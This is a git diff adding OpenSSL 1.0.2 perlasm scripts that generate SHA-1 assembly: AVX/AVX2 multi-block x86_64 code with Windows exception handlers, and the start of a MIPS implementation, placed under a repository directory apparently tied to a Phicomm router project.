+	vpsrld	\$27,$a,$t3
+	vpxor	$c,$t0,$t0			# Parity(b,c,d)
+	 vpxor	@Xi[3],@Xi[1],@Xi[1]
+
+	vpslld	\$30,$b,$t1
+	vpor	$t3,$t2,$t2			# rol(a,5)
+	vpaddd	$t0,$e,$e			# e+=Parity(b,c,d)
+	 vpsrld	\$31,@Xi[1],$tx
+	 vpaddd	@Xi[1],@Xi[1],@Xi[1]
+
+	vpsrld	\$2,$b,$b
+	vpaddd	$t2,$e,$e			# e+=rol(a,5)
+	 vpor	$tx,@Xi[1],@Xi[1]		# rol(@Xi[1],1)
+	vpor	$t1,$b,$b			# b=rol(b,30)
+___
+$code.=<<___ if ($i==79);
+	vpslld	\$5,$a,$t2
+	vpaddd	$K,$e,$e			# e+=K_20_39
+	vpxor	$b,$d,$t0
+
+	vpsrld	\$27,$a,$t3
+	vpaddd	@Xi[0],$e,$e			# e+=X[i]
+	vpxor	$c,$t0,$t0			# Parity(b,c,d)
+
+	vpslld	\$30,$b,$t1
+	vpor	$t3,$t2,$t2			# rol(a,5)
+	vpaddd	$t0,$e,$e			# e+=Parity(b,c,d)
+
+	vpsrld	\$2,$b,$b
+	vpaddd	$t2,$e,$e			# e+=rol(a,5)
+	vpor	$t1,$b,$b			# b=rol(b,30)
+___
+push(@Xi,shift(@Xi));
+}
+
+sub BODY_40_59_avx {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+
+$code.=<<___;
+	vpxor	@Xi[-2],@Xi[1],@Xi[1]		# "X[13]"
+	vmovdqa	`&Xi_off($j+2)`,@Xi[3]		# "X[2]"
+
+	vpaddd	$K,$e,$e			# e+=K_40_59
+	vpslld	\$5,$a,$t2
+	vpand	$c,$d,$t1
+	 vpxor	`&Xi_off($j+8)`,@Xi[1],@Xi[1]
+
+	vpaddd	$t1,$e,$e
+	vpsrld	\$27,$a,$t3
+	vpxor	$c,$d,$t0
+	 vpxor	@Xi[3],@Xi[1],@Xi[1]
+
+	vmovdqu	@Xi[0],`&Xi_off($i)`
+	vpaddd	@Xi[0],$e,$e			# e+=X[i]
+	vpor	$t3,$t2,$t2			# rol(a,5)
+	 vpsrld	\$31,@Xi[1],$tx
+	vpand	$b,$t0,$t0
+	 vpaddd	@Xi[1],@Xi[1],@Xi[1]
+
+	vpslld	\$30,$b,$t1
+	vpaddd	$t0,$e,$e			# e+=Maj(b,d,c)
+
+	vpsrld	\$2,$b,$b
+	vpaddd	$t2,$e,$e			# e+=rol(a,5)
+	 vpor	$tx,@Xi[1],@Xi[1]		# rol(@X[1],1)
+	vpor	$t1,$b,$b			# b=rol(b,30)
+___
+push(@Xi,shift(@Xi));
+}
+
+$code.=<<___;
+.type	sha1_multi_block_avx,\@function,3
+.align	32
+sha1_multi_block_avx:
+_avx_shortcut:
+___
+$code.=<<___ if ($avx>1);
+	shr	\$32,%rcx
+	cmp	\$2,$num
+	jb	.Lavx
+	test	\$`1<<5`,%ecx
+	jnz	_avx2_shortcut
+	jmp	.Lavx
+.align	32
+.Lavx:
+___
+$code.=<<___;
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,-0x78(%rax)
+	movaps	%xmm11,-0x68(%rax)
+	movaps	%xmm12,-0x58(%rax)
+	movaps	%xmm13,-0x48(%rax)
+	movaps	%xmm14,-0x38(%rax)
+	movaps	%xmm15,-0x28(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`, %rsp
+	and	\$-256,%rsp
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody_avx:
+	lea	K_XX_XX(%rip),$Tbl
+	lea	`$REG_SZ*16`(%rsp),%rbx
+
+	vzeroupper
+.Loop_grande_avx:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# original $num
+	xor	$num,$num
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	test	$num,$num
+	jz	.Ldone_avx
+
+	vmovdqu	0x00($ctx),$A			# load context
+	 lea	128(%rsp),%rax
+	vmovdqu	0x20($ctx),$B
+	vmovdqu	0x40($ctx),$C
+	vmovdqu	0x60($ctx),$D
+	vmovdqu	0x80($ctx),$E
+	vmovdqu	0x60($Tbl),$tx			# pbswap_mask
+	jmp	.Loop_avx
+
+.align	32
+.Loop_avx:
+___
+$code.="	vmovdqa	-0x20($Tbl),$K\n";	# K_00_19
+for($i=0;$i<20;$i++)	{ &BODY_00_19_avx($i,@V); unshift(@V,pop(@V)); }
+$code.="	vmovdqa	0x00($Tbl),$K\n";	# K_20_39
+for(;$i<40;$i++)	{ &BODY_20_39_avx($i,@V); unshift(@V,pop(@V)); }
+$code.="	vmovdqa	0x20($Tbl),$K\n";	# K_40_59
+for(;$i<60;$i++)	{ &BODY_40_59_avx($i,@V); unshift(@V,pop(@V)); }
+$code.="	vmovdqa	0x40($Tbl),$K\n";	# K_60_79
+for(;$i<80;$i++)	{ &BODY_20_39_avx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	mov	\$1,%ecx
+___
+for($i=0;$i<4;$i++) {
+    $code.=<<___;
+	cmp	`4*$i`(%rbx),%ecx		# examine counters
+	cmovge	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	vmovdqu	(%rbx),$t0			# pull counters
+	vpxor	$t2,$t2,$t2
+	vmovdqa	$t0,$t1
+	vpcmpgtd $t2,$t1,$t1			# mask value
+	vpaddd	$t1,$t0,$t0			# counters--
+
+	vpand	$t1,$A,$A
+	vpand	$t1,$B,$B
+	vpaddd	0x00($ctx),$A,$A
+	vpand	$t1,$C,$C
+	vpaddd	0x20($ctx),$B,$B
+	vpand	$t1,$D,$D
+	vpaddd	0x40($ctx),$C,$C
+	vpand	$t1,$E,$E
+	vpaddd	0x60($ctx),$D,$D
+	vpaddd	0x80($ctx),$E,$E
+	vmovdqu	$A,0x00($ctx)
+	vmovdqu	$B,0x20($ctx)
+	vmovdqu	$C,0x40($ctx)
+	vmovdqu	$D,0x60($ctx)
+	vmovdqu	$E,0x80($ctx)
+
+	vmovdqu	$t0,(%rbx)			# save counters
+	vmovdqu	0x60($Tbl),$tx			# pbswap_mask
+	dec	$num
+	jnz	.Loop_avx
+
+	mov	`$REG_SZ*17+8`(%rsp),$num
+	lea	$REG_SZ($ctx),$ctx
+	lea	`16*$REG_SZ/4`($inp),$inp
+	dec	$num
+	jnz	.Loop_grande_avx
+
+.Ldone_avx:
+	mov	`$REG_SZ*17`(%rsp),%rax		# orignal %rsp
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xb8(%rax),%xmm6
+	movaps	-0xa8(%rax),%xmm7
+	movaps	-0x98(%rax),%xmm8
+	movaps	-0x88(%rax),%xmm9
+	movaps	-0x78(%rax),%xmm10
+	movaps	-0x68(%rax),%xmm11
+	movaps	-0x58(%rax),%xmm12
+	movaps	-0x48(%rax),%xmm13
+	movaps	-0x38(%rax),%xmm14
+	movaps	-0x28(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue_avx:
+	ret
+.size	sha1_multi_block_avx,.-sha1_multi_block_avx
+___
+
+						if ($avx>1) {
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+
+$REG_SZ=32;
+
+@ptr=map("%r$_",(12..15,8..11));
+
+@V=($A,$B,$C,$D,$E)=map("%ymm$_",(0..4));
+($t0,$t1,$t2,$t3,$tx)=map("%ymm$_",(5..9));
+@Xi=map("%ymm$_",(10..14));
+$K="%ymm15";
+
+$code.=<<___;
+.type	sha1_multi_block_avx2,\@function,3
+.align	32
+sha1_multi_block_avx2:
+_avx2_shortcut:
+	mov	%rsp,%rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	movaps	%xmm6,(%rsp)
+	movaps	%xmm7,0x10(%rsp)
+	movaps	%xmm8,0x20(%rsp)
+	movaps	%xmm9,0x30(%rsp)
+	movaps	%xmm10,0x40(%rsp)
+	movaps	%xmm11,0x50(%rsp)
+	movaps	%xmm12,-0x78(%rax)
+	movaps	%xmm13,-0x68(%rax)
+	movaps	%xmm14,-0x58(%rax)
+	movaps	%xmm15,-0x48(%rax)
+___
+$code.=<<___;
+	sub	\$`$REG_SZ*18`, %rsp
+	and	\$-256,%rsp
+	mov	%rax,`$REG_SZ*17`(%rsp)		# original %rsp
+.Lbody_avx2:
+	lea	K_XX_XX(%rip),$Tbl
+	shr	\$1,$num
+
+	vzeroupper
+.Loop_grande_avx2:
+	mov	$num,`$REG_SZ*17+8`(%rsp)	# original $num
+	xor	$num,$num
+	lea	`$REG_SZ*16`(%rsp),%rbx
+___
+for($i=0;$i<8;$i++) {
+    $code.=<<___;
+	mov	`16*$i+0`($inp),@ptr[$i]	# input pointer
+	mov	`16*$i+8`($inp),%ecx		# number of blocks
+	cmp	$num,%ecx
+	cmovg	%ecx,$num			# find maximum
+	test	%ecx,%ecx
+	mov	%ecx,`4*$i`(%rbx)		# initialize counters
+	cmovle	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	vmovdqu	0x00($ctx),$A			# load context
+	 lea	128(%rsp),%rax
+	vmovdqu	0x20($ctx),$B
+	 lea	256+128(%rsp),%rbx
+	vmovdqu	0x40($ctx),$C
+	vmovdqu	0x60($ctx),$D
+	vmovdqu	0x80($ctx),$E
+	vmovdqu	0x60($Tbl),$tx			# pbswap_mask
+	jmp	.Loop_avx2
+
+.align	32
+.Loop_avx2:
+___
+$code.="	vmovdqa	-0x20($Tbl),$K\n";	# K_00_19
+for($i=0;$i<20;$i++)	{ &BODY_00_19_avx($i,@V); unshift(@V,pop(@V)); }
+$code.="	vmovdqa	0x00($Tbl),$K\n";	# K_20_39
+for(;$i<40;$i++)	{ &BODY_20_39_avx($i,@V); unshift(@V,pop(@V)); }
+$code.="	vmovdqa	0x20($Tbl),$K\n";	# K_40_59
+for(;$i<60;$i++)	{ &BODY_40_59_avx($i,@V); unshift(@V,pop(@V)); }
+$code.="	vmovdqa	0x40($Tbl),$K\n";	# K_60_79
+for(;$i<80;$i++)	{ &BODY_20_39_avx($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	mov	\$1,%ecx
+	lea	`$REG_SZ*16`(%rsp),%rbx
+___
+for($i=0;$i<8;$i++) {
+    $code.=<<___;
+	cmp	`4*$i`(%rbx),%ecx		# examine counters
+	cmovge	$Tbl,@ptr[$i]			# cancel input
+___
+}
+$code.=<<___;
+	vmovdqu	(%rbx),$t0		# pull counters
+	vpxor	$t2,$t2,$t2
+	vmovdqa	$t0,$t1
+	vpcmpgtd $t2,$t1,$t1			# mask value
+	vpaddd	$t1,$t0,$t0			# counters--
+
+	vpand	$t1,$A,$A
+	vpand	$t1,$B,$B
+	vpaddd	0x00($ctx),$A,$A
+	vpand	$t1,$C,$C
+	vpaddd	0x20($ctx),$B,$B
+	vpand	$t1,$D,$D
+	vpaddd	0x40($ctx),$C,$C
+	vpand	$t1,$E,$E
+	vpaddd	0x60($ctx),$D,$D
+	vpaddd	0x80($ctx),$E,$E
+	vmovdqu	$A,0x00($ctx)
+	vmovdqu	$B,0x20($ctx)
+	vmovdqu	$C,0x40($ctx)
+	vmovdqu	$D,0x60($ctx)
+	vmovdqu	$E,0x80($ctx)
+
+	vmovdqu	$t0,(%rbx)			# save counters
+	lea	256+128(%rsp),%rbx
+	vmovdqu	0x60($Tbl),$tx			# pbswap_mask
+	dec	$num
+	jnz	.Loop_avx2
+
+	#mov	`$REG_SZ*17+8`(%rsp),$num
+	#lea	$REG_SZ($ctx),$ctx
+	#lea	`16*$REG_SZ/4`($inp),$inp
+	#dec	$num
+	#jnz	.Loop_grande_avx2
+
+.Ldone_avx2:
+	mov	`$REG_SZ*17`(%rsp),%rax		# orignal %rsp
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp
+.Lepilogue_avx2:
+	ret
+.size	sha1_multi_block_avx2,.-sha1_multi_block_avx2
+___
+						}	}}}
+$code.=<<___;
+
+.align	256
+	.long	0x5a827999,0x5a827999,0x5a827999,0x5a827999	# K_00_19
+	.long	0x5a827999,0x5a827999,0x5a827999,0x5a827999	# K_00_19
+K_XX_XX:
+	.long	0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1	# K_20_39
+	.long	0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1	# K_20_39
+	.long	0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc	# K_40_59
+	.long	0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc	# K_40_59
+	.long	0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6	# K_60_79
+	.long	0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6	# K_60_79
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f	# pbswap
+	.byte	0xf,0xe,0xd,0xc,0xb,0xa,0x9,0x8,0x7,0x6,0x5,0x4,0x3,0x2,0x1,0x0
+	.asciz	"SHA1 multi-block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+if ($win64) {
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<.Lbody
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=.Lepilogue
+	jae	.Lin_prologue
+
+	mov	`16*17`(%rax),%rax	# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+
+	lea	-24-10*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+.Lin_prologue:
+	mov	8(%rax),%rdi
+	mov	16(%rax),%rsi
+	mov	%rax,152($context)	# restore context->Rsp
+	mov	%rsi,168($context)	# restore context->Rsi
+	mov	%rdi,176($context)	# restore context->Rdi
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$154,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+___
+$code.=<<___ if ($avx>1);
+.type	avx2_handler,\@abi-omnipotent
+.align	16
+avx2_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# end of prologue label
+	cmp	%r10,%rbx		# context->Rip<body label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	mov	`32*17`($context),%rax	# pull saved stack pointer
+
+	mov	-8(%rax),%rbx
+	mov	-16(%rax),%rbp
+	mov	-24(%rax),%r12
+	mov	-32(%rax),%r13
+	mov	-40(%rax),%r14
+	mov	-48(%rax),%r15
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore cotnext->R12
+	mov	%r13,224($context)	# restore cotnext->R13
+	mov	%r14,232($context)	# restore cotnext->R14
+	mov	%r15,240($context)	# restore cotnext->R15
+
+	lea	-56-10*16(%rax),%rsi
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx
+	.long	0xa548f3fc		# cld; rep movsq
+
+	jmp	.Lin_prologue
+.size	avx2_handler,.-avx2_handler
+___
+$code.=<<___;
+.section	.pdata
+.align	4
+	.rva	.LSEH_begin_sha1_multi_block
+	.rva	.LSEH_end_sha1_multi_block
+	.rva	.LSEH_info_sha1_multi_block
+	.rva	.LSEH_begin_sha1_multi_block_shaext
+	.rva	.LSEH_end_sha1_multi_block_shaext
+	.rva	.LSEH_info_sha1_multi_block_shaext
+___
+$code.=<<___ if ($avx);
+	.rva	.LSEH_begin_sha1_multi_block_avx
+	.rva	.LSEH_end_sha1_multi_block_avx
+	.rva	.LSEH_info_sha1_multi_block_avx
+___
+$code.=<<___ if ($avx>1);
+	.rva	.LSEH_begin_sha1_multi_block_avx2
+	.rva	.LSEH_end_sha1_multi_block_avx2
+	.rva	.LSEH_info_sha1_multi_block_avx2
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_sha1_multi_block:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lbody,.Lepilogue			# HandlerData[]
+.LSEH_info_sha1_multi_block_shaext:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lbody_shaext,.Lepilogue_shaext	# HandlerData[]
+___
+$code.=<<___ if ($avx);
+.LSEH_info_sha1_multi_block_avx:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lbody_avx,.Lepilogue_avx		# HandlerData[]
+___
+$code.=<<___ if ($avx>1);
+.LSEH_info_sha1_multi_block_avx2:
+	.byte	9,0,0,0
+	.rva	avx2_handler
+	.rva	.Lbody_avx2,.Lepilogue_avx2		# HandlerData[]
+___
+}
+####################################################################
+
+sub rex {
+  local *opcode=shift;
+  my ($dst,$src)=@_;
+  my $rex=0;
+
+    $rex|=0x04			if ($dst>=8);
+    $rex|=0x01			if ($src>=8);
+    unshift @opcode,$rex|0x40	if ($rex);
+}
+
+sub sha1rnds4 {
+    if (@_[0] =~ /\$([x0-9a-f]+),\s*%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x3a,0xcc);
+	rex(\@opcode,$3,$2);
+	push @opcode,0xc0|($2&7)|(($3&7)<<3);		# ModR/M
+	my $c=$1;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return "sha1rnds4\t".@_[0];
+    }
+}
+
+sub sha1op38 {
+    my $instr = shift;
+    my %opcodelet = (
+		"sha1nexte" => 0xc8,
+  		"sha1msg1"  => 0xc9,
+		"sha1msg2"  => 0xca	);
+
+    if (defined($opcodelet{$instr}) && @_[0] =~ /%xmm([0-9]+),\s*%xmm([0-9]+)/) {
+      my @opcode=(0x0f,0x38);
+	rex(\@opcode,$2,$1);
+	push @opcode,$opcodelet{$instr};
+	push @opcode,0xc0|($1&7)|(($2&7)<<3);		# ModR/M
+	return ".byte\t".join(',',@opcode);
+    } else {
+	return $instr."\t".@_[0];
+    }
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval($1)/ge;
+
+	s/\b(sha1rnds4)\s+(.*)/sha1rnds4($2)/geo		or
+	s/\b(sha1[^\s]*)\s+(.*)/sha1op38($1,$2)/geo		or
+
+	s/\b(vmov[dq])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go		or
+	s/\b(vmovdqu)\b(.+)%x%ymm([0-9]+)/$1$2%xmm$3/go		or
+	s/\b(vpinsr[qd])\b(.+)%ymm([0-9]+),%ymm([0-9]+)/$1$2%xmm$3,%xmm$4/go	or
+	s/\b(vpextr[qd])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go	or
+	s/\b(vinserti128)\b(\s+)%ymm/$1$2\$1,%xmm/go		or
+	s/\b(vpbroadcast[qd]\s+)%ymm([0-9]+)/$1%xmm$2/go;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-mips.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-mips.pl
new file mode 100644
index 0000000..3408493
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-mips.pl
@@ -0,0 +1,450 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA1 block procedure for MIPS.
+
+# Performance improvement is 30% on unaligned input. The "secret" is
+# to deploy lwl/lwr pair to load unaligned input. One could have
+# vectorized Xupdate on MIPSIII/IV, but the goal was to code MIPS32-
+# compatible subroutine. There is room for minor optimization on
+# little-endian platforms...
+
+# September 2012.
+#
+# Add MIPS32r2 code (>25% less instructions).
+
+######################################################################
+# There is a number of MIPS ABI in use, O32 and N32/64 are most
+# widely used. Then there is a new contender: NUBI. It appears that if
+# one picks the latter, it's possible to arrange code in ABI neutral
+# manner. Therefore let's stick to NUBI register layout:
+#
+($zero,$at,$t0,$t1,$t2)=map("\$$_",(0..2,24,25));
+($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7,$s8,$s9,$s10,$s11)=map("\$$_",(12..23));
+($gp,$tp,$sp,$fp,$ra)=map("\$$_",(3,28..31));
+#
+# The return value is placed in $a0. Following coding rules facilitate
+# interoperability:
+#
+# - never ever touch $tp, "thread pointer", former $gp;
+# - copy return value to $t0, former $v0 [or to $a0 if you're adapting
+#   old code];
+# - on O32 populate $a4-$a7 with 'lw $aN,4*N($sp)' if necessary;
+#
+# For reference here is register layout for N32/64 MIPS ABIs:
+#
+# ($zero,$at,$v0,$v1)=map("\$$_",(0..3));
+# ($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("\$$_",(4..11));
+# ($t0,$t1,$t2,$t3,$t8,$t9)=map("\$$_",(12..15,24,25));
+# ($s0,$s1,$s2,$s3,$s4,$s5,$s6,$s7)=map("\$$_",(16..23));
+# ($gp,$sp,$fp,$ra)=map("\$$_",(28..31));
+#
+$flavour = shift || "o32"; # supported flavours are o32,n32,64,nubi32,nubi64
+
+if ($flavour =~ /64|n32/i) {
+	$PTR_ADD="dadd";	# incidentally works even on n32
+	$PTR_SUB="dsub";	# incidentally works even on n32
+	$REG_S="sd";
+	$REG_L="ld";
+	$PTR_SLL="dsll";	# incidentally works even on n32
+	$SZREG=8;
+} else {
+	$PTR_ADD="add";
+	$PTR_SUB="sub";
+	$REG_S="sw";
+	$REG_L="lw";
+	$PTR_SLL="sll";
+	$SZREG=4;
+}
+#
+# <appro@openssl.org>
+#
+######################################################################
+
+$big_endian=(`echo MIPSEL | $ENV{CC} -E -`=~/MIPSEL/)?1:0 if ($ENV{CC});
+
+for (@ARGV) {	$output=$_ if (/^\w[\w\-]*\.\w+$/);   }
+open STDOUT,">$output";
+
+if (!defined($big_endian))
+            {   $big_endian=(unpack('L',pack('N',1))==1);   }
+
+# offsets of the Most and Least Significant Bytes
+$MSB=$big_endian?0:3;
+$LSB=3&~$MSB;
+
+@X=map("\$$_",(8..23));	# a4-a7,s0-s11
+
+$ctx=$a0;
+$inp=$a1;
+$num=$a2;
+$A="\$1";
+$B="\$2";
+$C="\$3";
+$D="\$7";
+$E="\$24";	@V=($A,$B,$C,$D,$E);
+$t0="\$25";
+$t1=$num;	# $num is offloaded to stack
+$t2="\$30";	# fp
+$K="\$31";	# ra
+
+sub BODY_00_14 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___	if (!$big_endian);
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	wsbh	@X[$i],@X[$i]	# byte swap($i)
+	rotr	@X[$i],@X[$i],16
+#else
+	srl	$t0,@X[$i],24	# byte swap($i)
+	srl	$t1,@X[$i],8
+	andi	$t2,@X[$i],0xFF00
+	sll	@X[$i],@X[$i],24
+	andi	$t1,0xFF00
+	sll	$t2,$t2,8
+	or	@X[$i],$t0
+	or	$t1,$t2
+	or	@X[$i],$t1
+#endif
+___
+$code.=<<___;
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	addu	$e,$K		# $i
+	xor	$t0,$c,$d
+	rotr	$t1,$a,27
+	 lwl	@X[$j],$j*4+$MSB($inp)
+	and	$t0,$b
+	addu	$e,$t1
+	 lwr	@X[$j],$j*4+$LSB($inp)
+	xor	$t0,$d
+	addu	$e,@X[$i]
+	rotr	$b,$b,2
+	addu	$e,$t0
+#else
+	 lwl	@X[$j],$j*4+$MSB($inp)
+	sll	$t0,$a,5	# $i
+	addu	$e,$K
+	 lwr	@X[$j],$j*4+$LSB($inp)
+	srl	$t1,$a,27
+	addu	$e,$t0
+	xor	$t0,$c,$d
+	addu	$e,$t1
+	sll	$t2,$b,30
+	and	$t0,$b
+	srl	$b,$b,2
+	xor	$t0,$d
+	addu	$e,@X[$i]
+	or	$b,$t2
+	addu	$e,$t0
+#endif
+___
+}
+
+sub BODY_15_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+
+$code.=<<___	if (!$big_endian && $i==15);
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	wsbh	@X[$i],@X[$i]	# byte swap($i)
+	rotr	@X[$i],@X[$i],16
+#else
+	srl	$t0,@X[$i],24	# byte swap($i)
+	srl	$t1,@X[$i],8
+	andi	$t2,@X[$i],0xFF00
+	sll	@X[$i],@X[$i],24
+	andi	$t1,0xFF00
+	sll	$t2,$t2,8
+	or	@X[$i],$t0
+	or	@X[$i],$t1
+	or	@X[$i],$t2
+#endif
+___
+$code.=<<___;
+#if defined(_MIPS_ARCH_MIPS32R2) || defined(_MIPS_ARCH_MIPS64R2)
+	addu	$e,$K		# $i
+	 xor	@X[$j%16],@X[($j+2)%16]
+	xor	$t0,$c,$d
+	rotr	$t1,$a,27
+	 xor	@X[$j%16],@X[($j+8)%16]
+	and	$t0,$b
+	addu	$e,$t1
+	 xor	@X[$j%16],@X[($j+13)%16]
+	xor	$t0,$d
+	addu	$e,@X[$i%16]
+	 rotr	@X[$j%16],@X[$j%16],31
